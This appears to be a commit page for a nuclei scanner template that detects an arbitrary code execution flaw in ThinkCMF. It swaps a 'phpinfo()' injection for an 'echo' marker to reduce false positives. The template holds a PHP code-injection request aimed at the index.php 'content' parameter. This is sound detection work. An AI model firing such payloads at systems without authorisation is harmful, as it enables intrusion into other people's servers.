daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fix: Update the template to avoid false positives 

While testing I got a false positive. The `phpinfo();` was one `index.php` and any parameter appended did not affect the output. So I got a false positive because the template tests for `phpinfo();`. So I propose that the test string is updated to something random and if there is execution the string will show on the output.
patch-1
0x08 2022-08-31 00:03:36 +03:00 committed by GitHub
parent cce6abaebf
commit 0ea1df844a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
View File

@ -11,16 +11,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20'TestVuln';"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "PHP License"
- "PHP Variables"
- "TestVuln"
condition: and
- type: status